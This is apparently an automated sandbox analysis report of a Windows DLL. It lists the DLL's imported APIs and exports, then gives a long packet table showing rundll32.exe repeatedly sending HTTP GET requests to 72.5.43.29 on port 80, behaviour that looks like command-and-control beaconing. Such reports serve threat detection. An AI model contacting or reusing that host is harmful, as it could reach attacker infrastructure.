KERNEL32.dllGetLastError, SetLastError, ExpandEnvironmentStringsW, SetCurrentDirectoryW, GetCurrentDirectoryW, CreateFileW, DeleteFileW, GetVolumeInformationW, ReadFile, RemoveDirectoryW, SetFilePointer, WriteFile, SetHandleInformation, CreatePipe, PeekNamedPipe, WaitForSingleObject, CreateMutexW, CreateThread, TerminateProcess, CreateProcessW, GlobalMemoryStatusEx, GetTickCount, GetComputerNameExW, GetModuleFileNameW, GetComputerNameW, MultiByteToWideChar, WideCharToMultiByte, HeapAlloc, HeapReAlloc, HeapFree, GetProcessHeap, GetTempFileNameW, GetTempPathW, GetSystemDirectoryW, LocalFree, Sleep, CloseHandle, LoadLibraryW, GetProcAddress, GetModuleHandleW, OpenMutexW, RaiseException, WriteConsoleW, FlushFileBuffers, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwindEx, InterlockedFlushSList, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, GetACP, GetStdHandle, GetFileType, LCMapStringW, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, SetStdHandle, GetSystemInfo
ADVAPI32.dllSystemFunction036, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExW, RegCloseKey
SHELL32.dllSHGetFolderPathW
ole32.dllCoTaskMemFree
WS2_32.dllgethostbyname, inet_ntoa, gethostname, WSAStartup, WSACleanup

Exports

NameOrdinalAddress
DllGetClassObject10x180001dd0
DllRegisterServer20x180001e90
DllRegisterServerEx30x180001e70
DllUnregisterServer40x180001e90
Start50x180001ea0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Aug 15, 2024 05:29:33.269249916 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:33.274693966 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:33.274800062 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:33.274914026 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:33.279867887 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:33.979973078 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:33.980271101 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.005033016 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.009998083 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.220612049 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.220681906 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.220717907 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.220886946 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.220886946 CEST4973080192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.225718021 CEST804973072.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.240308046 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.245285034 CEST804973172.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.245497942 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.245693922 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.245729923 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.250644922 CEST804973172.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.250674963 CEST804973172.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.934056044 CEST804973172.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.934271097 CEST804973172.5.43.29192.168.2.4
Aug 15, 2024 05:29:34.934266090 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.934367895 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.934875011 CEST4973180192.168.2.472.5.43.29
Aug 15, 2024 05:29:34.939773083 CEST804973172.5.43.29192.168.2.4
Aug 15, 2024 05:29:40.262680054 CEST4973480192.168.2.472.5.43.29
Aug 15, 2024 05:29:40.267611027 CEST804973472.5.43.29192.168.2.4
Aug 15, 2024 05:29:40.267688990 CEST4973480192.168.2.472.5.43.29
Aug 15, 2024 05:29:40.267796040 CEST4973480192.168.2.472.5.43.29
Aug 15, 2024 05:29:40.272568941 CEST804973472.5.43.29192.168.2.4
Aug 15, 2024 05:29:40.952701092 CEST804973472.5.43.29192.168.2.4
Aug 15, 2024 05:29:40.952778101 CEST4973480192.168.2.472.5.43.29
Aug 15, 2024 05:29:40.952873945 CEST4973480192.168.2.472.5.43.29
Aug 15, 2024 05:29:40.953321934 CEST804973472.5.43.29192.168.2.4
Aug 15, 2024 05:29:40.953386068 CEST4973480192.168.2.472.5.43.29
Aug 15, 2024 05:29:40.958719969 CEST804973472.5.43.29192.168.2.4
Aug 15, 2024 05:29:44.107410908 CEST4973980192.168.2.472.5.43.29
Aug 15, 2024 05:29:44.113042116 CEST804973972.5.43.29192.168.2.4
Aug 15, 2024 05:29:44.113148928 CEST4973980192.168.2.472.5.43.29
Aug 15, 2024 05:29:44.115083933 CEST4973980192.168.2.472.5.43.29
Aug 15, 2024 05:29:44.122937918 CEST804973972.5.43.29192.168.2.4
Aug 15, 2024 05:29:44.861294031 CEST804973972.5.43.29192.168.2.4
Aug 15, 2024 05:29:44.861335039 CEST804973972.5.43.29192.168.2.4
Aug 15, 2024 05:29:44.861507893 CEST4973980192.168.2.472.5.43.29
Aug 15, 2024 05:29:44.861507893 CEST4973980192.168.2.472.5.43.29
Aug 15, 2024 05:29:44.868509054 CEST804973972.5.43.29192.168.2.4
Aug 15, 2024 05:29:51.919011116 CEST4974080192.168.2.472.5.43.29
Aug 15, 2024 05:29:51.927071095 CEST804974072.5.43.29192.168.2.4
Aug 15, 2024 05:29:51.927294970 CEST4974080192.168.2.472.5.43.29
Aug 15, 2024 05:29:51.927395105 CEST4974080192.168.2.472.5.43.29
Aug 15, 2024 05:29:51.934935093 CEST804974072.5.43.29192.168.2.4
Aug 15, 2024 05:29:52.612926960 CEST804974072.5.43.29192.168.2.4
Aug 15, 2024 05:29:52.613033056 CEST4974080192.168.2.472.5.43.29
Aug 15, 2024 05:29:52.613104105 CEST804974072.5.43.29192.168.2.4
Aug 15, 2024 05:29:52.613131046 CEST4974080192.168.2.472.5.43.29
Aug 15, 2024 05:29:52.613173962 CEST4974080192.168.2.472.5.43.29
Aug 15, 2024 05:29:52.618123055 CEST804974072.5.43.29192.168.2.4
Aug 15, 2024 05:29:59.232140064 CEST4974180192.168.2.472.5.43.29
Aug 15, 2024 05:29:59.237518072 CEST804974172.5.43.29192.168.2.4
Aug 15, 2024 05:29:59.237627983 CEST4974180192.168.2.472.5.43.29
Aug 15, 2024 05:29:59.237814903 CEST4974180192.168.2.472.5.43.29
Aug 15, 2024 05:29:59.242794037 CEST804974172.5.43.29192.168.2.4
Aug 15, 2024 05:29:59.983433962 CEST804974172.5.43.29192.168.2.4
Aug 15, 2024 05:29:59.983483076 CEST804974172.5.43.29192.168.2.4
Aug 15, 2024 05:29:59.983530045 CEST4974180192.168.2.472.5.43.29
Aug 15, 2024 05:29:59.983584881 CEST4974180192.168.2.472.5.43.29
Aug 15, 2024 05:29:59.983695984 CEST4974180192.168.2.472.5.43.29
Aug 15, 2024 05:29:59.988517046 CEST804974172.5.43.29192.168.2.4
Aug 15, 2024 05:30:05.778851032 CEST4974280192.168.2.472.5.43.29
Aug 15, 2024 05:30:05.784225941 CEST804974272.5.43.29192.168.2.4
Aug 15, 2024 05:30:05.784548998 CEST4974280192.168.2.472.5.43.29
Aug 15, 2024 05:30:05.784789085 CEST4974280192.168.2.472.5.43.29
Aug 15, 2024 05:30:05.789707899 CEST804974272.5.43.29192.168.2.4
Aug 15, 2024 05:30:06.497452021 CEST804974272.5.43.29192.168.2.4
Aug 15, 2024 05:30:06.497545004 CEST804974272.5.43.29192.168.2.4
Aug 15, 2024 05:30:06.497894049 CEST4974280192.168.2.472.5.43.29
Aug 15, 2024 05:30:06.498034954 CEST4974280192.168.2.472.5.43.29
Aug 15, 2024 05:30:06.503340960 CEST804974272.5.43.29192.168.2.4
Aug 15, 2024 05:30:10.696465969 CEST4974380192.168.2.472.5.43.29
Aug 15, 2024 05:30:11.127252102 CEST804974372.5.43.29192.168.2.4
Aug 15, 2024 05:30:11.127464056 CEST4974380192.168.2.472.5.43.29
Aug 15, 2024 05:30:11.127800941 CEST4974380192.168.2.472.5.43.29
Aug 15, 2024 05:30:11.133003950 CEST804974372.5.43.29192.168.2.4
Aug 15, 2024 05:30:11.870028973 CEST804974372.5.43.29192.168.2.4
Aug 15, 2024 05:30:11.870117903 CEST804974372.5.43.29192.168.2.4
Aug 15, 2024 05:30:11.870336056 CEST4974380192.168.2.472.5.43.29
Aug 15, 2024 05:30:11.870537043 CEST4974380192.168.2.472.5.43.29
Aug 15, 2024 05:30:11.875643015 CEST804974372.5.43.29192.168.2.4
Aug 15, 2024 05:30:17.872545004 CEST4974480192.168.2.472.5.43.29
Aug 15, 2024 05:30:17.878071070 CEST804974472.5.43.29192.168.2.4
Aug 15, 2024 05:30:17.878437042 CEST4974480192.168.2.472.5.43.29
Aug 15, 2024 05:30:17.878631115 CEST4974480192.168.2.472.5.43.29
Aug 15, 2024 05:30:17.883770943 CEST804974472.5.43.29192.168.2.4
Aug 15, 2024 05:30:18.681452036 CEST804974472.5.43.29192.168.2.4
Aug 15, 2024 05:30:18.681544065 CEST4974480192.168.2.472.5.43.29
Aug 15, 2024 05:30:18.681659937 CEST4974480192.168.2.472.5.43.29
Aug 15, 2024 05:30:18.681811094 CEST804974472.5.43.29192.168.2.4
Aug 15, 2024 05:30:18.681886911 CEST4974480192.168.2.472.5.43.29
Aug 15, 2024 05:30:18.686856985 CEST804974472.5.43.29192.168.2.4
Aug 15, 2024 05:30:22.325506926 CEST4974680192.168.2.472.5.43.29
Aug 15, 2024 05:30:22.331505060 CEST804974672.5.43.29192.168.2.4
Aug 15, 2024 05:30:22.331760883 CEST4974680192.168.2.472.5.43.29
Aug 15, 2024 05:30:22.332113028 CEST4974680192.168.2.472.5.43.29
Aug 15, 2024 05:30:22.337940931 CEST804974672.5.43.29192.168.2.4
Aug 15, 2024 05:30:23.027292967 CEST804974672.5.43.29192.168.2.4
Aug 15, 2024 05:30:23.027436018 CEST804974672.5.43.29192.168.2.4
Aug 15, 2024 05:30:23.027654886 CEST4974680192.168.2.472.5.43.29
Aug 15, 2024 05:30:23.027941942 CEST4974680192.168.2.472.5.43.29
Aug 15, 2024 05:30:23.038307905 CEST804974672.5.43.29192.168.2.4
Aug 15, 2024 05:30:27.342283964 CEST4974780192.168.2.472.5.43.29
Aug 15, 2024 05:30:27.347758055 CEST804974772.5.43.29192.168.2.4
Aug 15, 2024 05:30:27.348023891 CEST4974780192.168.2.472.5.43.29
Aug 15, 2024 05:30:27.348251104 CEST4974780192.168.2.472.5.43.29
Aug 15, 2024 05:30:27.353563070 CEST804974772.5.43.29192.168.2.4
Aug 15, 2024 05:30:28.034893036 CEST804974772.5.43.29192.168.2.4
Aug 15, 2024 05:30:28.034951925 CEST804974772.5.43.29192.168.2.4
Aug 15, 2024 05:30:28.035130024 CEST4974780192.168.2.472.5.43.29
Aug 15, 2024 05:30:28.035130024 CEST4974780192.168.2.472.5.43.29
Aug 15, 2024 05:30:28.035370111 CEST4974780192.168.2.472.5.43.29
Aug 15, 2024 05:30:28.040508986 CEST804974772.5.43.29192.168.2.4
Aug 15, 2024 05:30:34.997411013 CEST4974880192.168.2.472.5.43.29
Aug 15, 2024 05:30:35.003875017 CEST804974872.5.43.29192.168.2.4
Aug 15, 2024 05:30:35.003959894 CEST4974880192.168.2.472.5.43.29
Aug 15, 2024 05:30:35.004123926 CEST4974880192.168.2.472.5.43.29
Aug 15, 2024 05:30:35.009092093 CEST804974872.5.43.29192.168.2.4
Aug 15, 2024 05:30:35.739840984 CEST804974872.5.43.29192.168.2.4
Aug 15, 2024 05:30:35.739895105 CEST804974872.5.43.29192.168.2.4
Aug 15, 2024 05:30:35.740127087 CEST4974880192.168.2.472.5.43.29
Aug 15, 2024 05:30:35.740250111 CEST4974880192.168.2.472.5.43.29
Aug 15, 2024 05:30:35.745163918 CEST804974872.5.43.29192.168.2.4
Aug 15, 2024 05:30:42.546958923 CEST4974980192.168.2.472.5.43.29
Aug 15, 2024 05:30:42.552192926 CEST804974972.5.43.29192.168.2.4
Aug 15, 2024 05:30:42.552293062 CEST4974980192.168.2.472.5.43.29
Aug 15, 2024 05:30:42.552580118 CEST4974980192.168.2.472.5.43.29
Aug 15, 2024 05:30:42.557459116 CEST804974972.5.43.29192.168.2.4
Aug 15, 2024 05:30:43.317878962 CEST804974972.5.43.29192.168.2.4
Aug 15, 2024 05:30:43.317981958 CEST804974972.5.43.29192.168.2.4
Aug 15, 2024 05:30:43.318084002 CEST4974980192.168.2.472.5.43.29
Aug 15, 2024 05:30:43.318084955 CEST4974980192.168.2.472.5.43.29
Aug 15, 2024 05:30:43.318084955 CEST4974980192.168.2.472.5.43.29
Aug 15, 2024 05:30:43.322997093 CEST804974972.5.43.29192.168.2.4
Aug 15, 2024 05:30:47.264909029 CEST4975080192.168.2.472.5.43.29
Aug 15, 2024 05:30:47.270044088 CEST804975072.5.43.29192.168.2.4
Aug 15, 2024 05:30:47.270128965 CEST4975080192.168.2.472.5.43.29
Aug 15, 2024 05:30:47.270389080 CEST4975080192.168.2.472.5.43.29
Aug 15, 2024 05:30:47.275247097 CEST804975072.5.43.29192.168.2.4
Aug 15, 2024 05:30:47.982248068 CEST804975072.5.43.29192.168.2.4
Aug 15, 2024 05:30:47.982321024 CEST804975072.5.43.29192.168.2.4
Aug 15, 2024 05:30:47.982424021 CEST4975080192.168.2.472.5.43.29
Aug 15, 2024 05:30:47.982424021 CEST4975080192.168.2.472.5.43.29
Aug 15, 2024 05:30:47.982641935 CEST4975080192.168.2.472.5.43.29
Aug 15, 2024 05:30:47.987519026 CEST804975072.5.43.29192.168.2.4
Aug 15, 2024 05:30:53.360039949 CEST4975180192.168.2.472.5.43.29
Aug 15, 2024 05:30:53.365251064 CEST804975172.5.43.29192.168.2.4
Aug 15, 2024 05:30:53.365325928 CEST4975180192.168.2.472.5.43.29
Aug 15, 2024 05:30:53.365479946 CEST4975180192.168.2.472.5.43.29
Aug 15, 2024 05:30:53.370341063 CEST804975172.5.43.29192.168.2.4
Aug 15, 2024 05:30:54.186480045 CEST804975172.5.43.29192.168.2.4
Aug 15, 2024 05:30:54.186538935 CEST804975172.5.43.29192.168.2.4
Aug 15, 2024 05:30:54.187537909 CEST4975180192.168.2.472.5.43.29
Aug 15, 2024 05:30:54.187537909 CEST4975180192.168.2.472.5.43.29
Aug 15, 2024 05:30:54.192544937 CEST804975172.5.43.29192.168.2.4
Aug 15, 2024 05:30:57.655215025 CEST4975280192.168.2.472.5.43.29
Aug 15, 2024 05:30:57.660356045 CEST804975272.5.43.29192.168.2.4
Aug 15, 2024 05:30:57.660521030 CEST4975280192.168.2.472.5.43.29
Aug 15, 2024 05:30:57.660660028 CEST4975280192.168.2.472.5.43.29
Aug 15, 2024 05:30:57.665530920 CEST804975272.5.43.29192.168.2.4
Aug 15, 2024 05:30:58.502275944 CEST804975272.5.43.29192.168.2.4
Aug 15, 2024 05:30:58.502378941 CEST4975280192.168.2.472.5.43.29
Aug 15, 2024 05:30:58.502383947 CEST804975272.5.43.29192.168.2.4
Aug 15, 2024 05:30:58.502439022 CEST4975280192.168.2.472.5.43.29
Aug 15, 2024 05:30:58.502482891 CEST4975280192.168.2.472.5.43.29
Aug 15, 2024 05:30:58.507471085 CEST804975272.5.43.29192.168.2.4
Aug 15, 2024 05:31:03.686496019 CEST4975380192.168.2.472.5.43.29
Aug 15, 2024 05:31:03.691768885 CEST804975372.5.43.29192.168.2.4
Aug 15, 2024 05:31:03.691956043 CEST4975380192.168.2.472.5.43.29
Aug 15, 2024 05:31:03.692082882 CEST4975380192.168.2.472.5.43.29
Aug 15, 2024 05:31:03.697720051 CEST804975372.5.43.29192.168.2.4
Aug 15, 2024 05:31:04.396198988 CEST804975372.5.43.29192.168.2.4
Aug 15, 2024 05:31:04.396294117 CEST4975380192.168.2.472.5.43.29
Aug 15, 2024 05:31:04.396382093 CEST804975372.5.43.29192.168.2.4
Aug 15, 2024 05:31:04.396395922 CEST4975380192.168.2.472.5.43.29
Aug 15, 2024 05:31:04.396611929 CEST4975380192.168.2.472.5.43.29
Aug 15, 2024 05:31:04.401302099 CEST804975372.5.43.29192.168.2.4
Aug 15, 2024 05:31:09.564569950 CEST4975480192.168.2.472.5.43.29
Aug 15, 2024 05:31:09.569849968 CEST804975472.5.43.29192.168.2.4
Aug 15, 2024 05:31:09.576457024 CEST4975480192.168.2.472.5.43.29
Aug 15, 2024 05:31:09.576457977 CEST4975480192.168.2.472.5.43.29
Aug 15, 2024 05:31:09.581794024 CEST804975472.5.43.29192.168.2.4
Aug 15, 2024 05:31:10.262981892 CEST804975472.5.43.29192.168.2.4
Aug 15, 2024 05:31:10.263036966 CEST804975472.5.43.29192.168.2.4
Aug 15, 2024 05:31:10.263356924 CEST4975480192.168.2.472.5.43.29
Aug 15, 2024 05:31:10.263356924 CEST4975480192.168.2.472.5.43.29
Aug 15, 2024 05:31:10.268354893 CEST804975472.5.43.29192.168.2.4
Aug 15, 2024 05:31:13.719933033 CEST4975580192.168.2.472.5.43.29
Aug 15, 2024 05:31:13.726579905 CEST804975572.5.43.29192.168.2.4
Aug 15, 2024 05:31:13.727725983 CEST4975580192.168.2.472.5.43.29
Aug 15, 2024 05:31:13.727726936 CEST4975580192.168.2.472.5.43.29
Aug 15, 2024 05:31:13.734416008 CEST804975572.5.43.29192.168.2.4
Aug 15, 2024 05:31:14.442205906 CEST804975572.5.43.29192.168.2.4
Aug 15, 2024 05:31:14.442259073 CEST804975572.5.43.29192.168.2.4
Aug 15, 2024 05:31:14.443749905 CEST4975580192.168.2.472.5.43.29
Aug 15, 2024 05:31:14.443749905 CEST4975580192.168.2.472.5.43.29
Aug 15, 2024 05:31:14.455480099 CEST804975572.5.43.29192.168.2.4
Aug 15, 2024 05:31:18.139801979 CEST4975680192.168.2.472.5.43.29
Aug 15, 2024 05:31:18.145092964 CEST804975672.5.43.29192.168.2.4
Aug 15, 2024 05:31:18.145576954 CEST4975680192.168.2.472.5.43.29
Aug 15, 2024 05:31:18.145819902 CEST4975680192.168.2.472.5.43.29
Aug 15, 2024 05:31:18.150986910 CEST804975672.5.43.29192.168.2.4
Aug 15, 2024 05:31:18.832154989 CEST804975672.5.43.29192.168.2.4
Aug 15, 2024 05:31:18.832245111 CEST4975680192.168.2.472.5.43.29
Aug 15, 2024 05:31:18.832317114 CEST804975672.5.43.29192.168.2.4
Aug 15, 2024 05:31:18.832336903 CEST4975680192.168.2.472.5.43.29
Aug 15, 2024 05:31:18.832371950 CEST4975680192.168.2.472.5.43.29
Aug 15, 2024 05:31:18.838186026 CEST804975672.5.43.29192.168.2.4
Aug 15, 2024 05:31:23.772468090 CEST4975780192.168.2.472.5.43.29
Aug 15, 2024 05:31:23.777694941 CEST804975772.5.43.29192.168.2.4
Aug 15, 2024 05:31:23.785537004 CEST4975780192.168.2.472.5.43.29
Aug 15, 2024 05:31:23.815515041 CEST4975780192.168.2.472.5.43.29
Aug 15, 2024 05:31:23.820420980 CEST804975772.5.43.29192.168.2.4
Aug 15, 2024 05:31:24.486062050 CEST804975772.5.43.29192.168.2.4
Aug 15, 2024 05:31:24.486126900 CEST804975772.5.43.29192.168.2.4
Aug 15, 2024 05:31:24.487417936 CEST4975780192.168.2.472.5.43.29
Aug 15, 2024 05:31:24.489299059 CEST4975780192.168.2.472.5.43.29
Aug 15, 2024 05:31:24.494183064 CEST804975772.5.43.29192.168.2.4
Aug 15, 2024 05:31:31.533363104 CEST4975880192.168.2.472.5.43.29
Aug 15, 2024 05:31:31.538618088 CEST804975872.5.43.29192.168.2.4
Aug 15, 2024 05:31:31.541568995 CEST4975880192.168.2.472.5.43.29
Aug 15, 2024 05:31:31.541568995 CEST4975880192.168.2.472.5.43.29
Aug 15, 2024 05:31:31.546421051 CEST804975872.5.43.29192.168.2.4
Aug 15, 2024 05:31:32.238486052 CEST804975872.5.43.29192.168.2.4
Aug 15, 2024 05:31:32.238775969 CEST804975872.5.43.29192.168.2.4
Aug 15, 2024 05:31:32.238908052 CEST4975880192.168.2.472.5.43.29
Aug 15, 2024 05:31:32.239073038 CEST4975880192.168.2.472.5.43.29
Aug 15, 2024 05:31:32.244012117 CEST804975872.5.43.29192.168.2.4
Aug 15, 2024 05:31:35.733984947 CEST4975980192.168.2.472.5.43.29
Aug 15, 2024 05:31:35.739023924 CEST804975972.5.43.29192.168.2.4
Aug 15, 2024 05:31:35.739289045 CEST4975980192.168.2.472.5.43.29
Aug 15, 2024 05:31:35.741480112 CEST4975980192.168.2.472.5.43.29
Aug 15, 2024 05:31:35.746520996 CEST804975972.5.43.29192.168.2.4
Aug 15, 2024 05:31:36.428111076 CEST804975972.5.43.29192.168.2.4
Aug 15, 2024 05:31:36.428220987 CEST804975972.5.43.29192.168.2.4
Aug 15, 2024 05:31:36.428417921 CEST4975980192.168.2.472.5.43.29
Aug 15, 2024 05:31:36.428574085 CEST4975980192.168.2.472.5.43.29
Aug 15, 2024 05:31:36.433471918 CEST804975972.5.43.29192.168.2.4
Aug 15, 2024 05:31:40.140402079 CEST4976080192.168.2.472.5.43.29
Aug 15, 2024 05:31:40.150460958 CEST804976072.5.43.29192.168.2.4
Aug 15, 2024 05:31:40.152584076 CEST4976080192.168.2.472.5.43.29
Aug 15, 2024 05:31:40.152585030 CEST4976080192.168.2.472.5.43.29
Aug 15, 2024 05:31:40.157433987 CEST804976072.5.43.29192.168.2.4
Aug 15, 2024 05:31:40.844693899 CEST804976072.5.43.29192.168.2.4
Aug 15, 2024 05:31:40.844746113 CEST4976080192.168.2.472.5.43.29
Aug 15, 2024 05:31:40.844882965 CEST4976080192.168.2.472.5.43.29
Aug 15, 2024 05:31:40.846036911 CEST804976072.5.43.29192.168.2.4
Aug 15, 2024 05:31:40.846075058 CEST4976080192.168.2.472.5.43.29
Aug 15, 2024 05:31:40.849863052 CEST804976072.5.43.29192.168.2.4
Aug 15, 2024 05:31:46.391428947 CEST4976180192.168.2.472.5.43.29
Aug 15, 2024 05:31:46.397712946 CEST804976172.5.43.29192.168.2.4
Aug 15, 2024 05:31:46.401484013 CEST4976180192.168.2.472.5.43.29
Aug 15, 2024 05:31:46.401648998 CEST4976180192.168.2.472.5.43.29
Aug 15, 2024 05:31:46.406480074 CEST804976172.5.43.29192.168.2.4
Aug 15, 2024 05:31:47.087104082 CEST804976172.5.43.29192.168.2.4
Aug 15, 2024 05:31:47.087157965 CEST4976180192.168.2.472.5.43.29
Aug 15, 2024 05:31:47.087304115 CEST804976172.5.43.29192.168.2.4
Aug 15, 2024 05:31:47.087333918 CEST4976180192.168.2.472.5.43.29
Aug 15, 2024 05:31:47.087353945 CEST4976180192.168.2.472.5.43.29
Aug 15, 2024 05:31:47.092134953 CEST804976172.5.43.29192.168.2.4
Aug 15, 2024 05:31:52.718504906 CEST4976280192.168.2.472.5.43.29
Aug 15, 2024 05:31:52.723617077 CEST804976272.5.43.29192.168.2.4
Aug 15, 2024 05:31:52.723754883 CEST4976280192.168.2.472.5.43.29
Aug 15, 2024 05:31:52.723887920 CEST4976280192.168.2.472.5.43.29
Aug 15, 2024 05:31:52.729849100 CEST804976272.5.43.29192.168.2.4
Aug 15, 2024 05:31:53.413911104 CEST804976272.5.43.29192.168.2.4
Aug 15, 2024 05:31:53.413964033 CEST4976280192.168.2.472.5.43.29
Aug 15, 2024 05:31:53.414063931 CEST4976280192.168.2.472.5.43.29
Aug 15, 2024 05:31:53.415081024 CEST804976272.5.43.29192.168.2.4
Aug 15, 2024 05:31:53.415122986 CEST4976280192.168.2.472.5.43.29
Aug 15, 2024 05:31:53.419702053 CEST804976272.5.43.29192.168.2.4
Aug 15, 2024 05:31:56.453417063 CEST4976380192.168.2.472.5.43.29
Aug 15, 2024 05:31:56.458393097 CEST804976372.5.43.29192.168.2.4
Aug 15, 2024 05:31:56.461515903 CEST4976380192.168.2.472.5.43.29
Aug 15, 2024 05:31:56.461824894 CEST4976380192.168.2.472.5.43.29
Aug 15, 2024 05:31:56.466664076 CEST804976372.5.43.29192.168.2.4
Aug 15, 2024 05:31:57.147458076 CEST804976372.5.43.29192.168.2.4
Aug 15, 2024 05:31:57.147491932 CEST804976372.5.43.29192.168.2.4
Aug 15, 2024 05:31:57.147559881 CEST4976380192.168.2.472.5.43.29
Aug 15, 2024 05:31:57.147644997 CEST4976380192.168.2.472.5.43.29
Aug 15, 2024 05:31:57.147671938 CEST4976380192.168.2.472.5.43.29
Aug 15, 2024 05:31:57.152513027 CEST804976372.5.43.29192.168.2.4
Aug 15, 2024 05:32:03.001056910 CEST4976480192.168.2.472.5.43.29
Aug 15, 2024 05:32:03.006068945 CEST804976472.5.43.29192.168.2.4
Aug 15, 2024 05:32:03.006161928 CEST4976480192.168.2.472.5.43.29
Aug 15, 2024 05:32:03.006439924 CEST4976480192.168.2.472.5.43.29
Aug 15, 2024 05:32:03.011220932 CEST804976472.5.43.29192.168.2.4
Aug 15, 2024 05:32:03.708177090 CEST804976472.5.43.29192.168.2.4
Aug 15, 2024 05:32:03.708194971 CEST804976472.5.43.29192.168.2.4
Aug 15, 2024 05:32:03.709697962 CEST4976480192.168.2.472.5.43.29
Aug 15, 2024 05:32:03.709697962 CEST4976480192.168.2.472.5.43.29
Aug 15, 2024 05:32:03.714634895 CEST804976472.5.43.29192.168.2.4
Aug 15, 2024 05:32:09.624260902 CEST4976580192.168.2.472.5.43.29
Aug 15, 2024 05:32:09.629275084 CEST804976572.5.43.29192.168.2.4
Aug 15, 2024 05:32:09.631849051 CEST4976580192.168.2.472.5.43.29
Aug 15, 2024 05:32:09.635644913 CEST4976580192.168.2.472.5.43.29
Aug 15, 2024 05:32:09.640527964 CEST804976572.5.43.29192.168.2.4
Aug 15, 2024 05:32:10.347987890 CEST804976572.5.43.29192.168.2.4
Aug 15, 2024 05:32:10.348098993 CEST804976572.5.43.29192.168.2.4
Aug 15, 2024 05:32:10.348242044 CEST4976580192.168.2.472.5.43.29
Aug 15, 2024 05:32:10.348429918 CEST4976580192.168.2.472.5.43.29
Aug 15, 2024 05:32:10.353210926 CEST804976572.5.43.29192.168.2.4
Aug 15, 2024 05:32:12.609469891 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:12.614554882 CEST804976672.5.43.29192.168.2.4
Aug 15, 2024 05:32:12.614625931 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:12.614826918 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:12.619661093 CEST804976672.5.43.29192.168.2.4
Aug 15, 2024 05:32:13.419794083 CEST804976672.5.43.29192.168.2.4
Aug 15, 2024 05:32:13.419852972 CEST804976672.5.43.29192.168.2.4
Aug 15, 2024 05:32:13.419862032 CEST804976672.5.43.29192.168.2.4
Aug 15, 2024 05:32:13.419863939 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:13.419950962 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:13.419950962 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:13.419950962 CEST4976680192.168.2.472.5.43.29
Aug 15, 2024 05:32:13.424777985 CEST804976672.5.43.29192.168.2.4
Aug 15, 2024 05:32:19.983828068 CEST4976780192.168.2.472.5.43.29
Aug 15, 2024 05:32:19.989089012 CEST804976772.5.43.29192.168.2.4
Aug 15, 2024 05:32:19.989222050 CEST4976780192.168.2.472.5.43.29
Aug 15, 2024 05:32:19.989518881 CEST4976780192.168.2.472.5.43.29
Aug 15, 2024 05:32:19.994400978 CEST804976772.5.43.29192.168.2.4
Aug 15, 2024 05:32:20.674880981 CEST804976772.5.43.29192.168.2.4
Aug 15, 2024 05:32:20.674900055 CEST804976772.5.43.29192.168.2.4
Aug 15, 2024 05:32:20.674963951 CEST4976780192.168.2.472.5.43.29
Aug 15, 2024 05:32:20.674963951 CEST4976780192.168.2.472.5.43.29
Aug 15, 2024 05:32:20.675067902 CEST4976780192.168.2.472.5.43.29
Aug 15, 2024 05:32:20.679877996 CEST804976772.5.43.29192.168.2.4

HTTP Request Dependency Graph

  • 72.5.43.29

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.44973072.5.43.29807568C:\Windows\System32\rundll32.exe
TimestampBytes transferredDirectionData
Aug 15, 2024 05:29:33.274914026 CEST393OUTGET / HTTP/1.1
